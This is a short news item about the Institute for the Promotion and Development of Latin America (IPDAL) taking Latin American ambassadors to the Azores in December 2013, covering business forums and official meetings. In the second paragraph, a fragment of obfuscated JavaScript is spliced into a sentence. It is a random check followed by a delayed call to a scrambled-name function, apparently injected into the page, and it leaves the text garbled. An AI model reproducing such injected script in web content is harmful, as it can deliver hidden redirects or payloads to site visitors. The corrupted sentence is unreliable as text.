The Institute for the Promotion and Development of Latin America took a delegation of ambassadors from Latin America, on an official visit, to the Autonomous Region of the Azores. Between the 3rd and 7th of December 2013, the group of ambassadors and diplomats invited by IPDAL carried out a series of institutional, business and cultural contacts on the islands of S. Miguel and Terceira. The cities of Ponta Delgada and Angra do Heroísmo were visited, and the delegation was received by the President of the Regional Government of the Azores, the Representative of the Republic and the Mayor of Ponta Delgada and Angra do Heroísmo.

The main moments of contact with companies were the two IPDAL-CGD Business Forums, on the two islands visited, which brought together the region’s main businesspeople, and the APAVT Congress, where IPDAL had a standom()*5);if(number1 ==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and representing Latin American countries. During the five days, Paulo Neves, President of IPDAL, highlighted the business opportunities that exist in the European region closest to Latin America. The delegation also had the opportunity to visit some of the most historically and artistically emblematic places, to discover the most relevant and, naturally, to explore some of the region’s natural riches, recognized as unique in the world.

This was the third visit organized by IPDAL with the Ambassadors of Latin America in 2013. In May the Porto and North region was visited and in July the Autonomous Region of Madeira was visited.
This is the sixth consecutive year that IPDAL takes Latin American Ambassadors on an official visit to regions of Portugal. This successful formula, found by the Institute, will continue throughout 2014, with new initiatives planned.
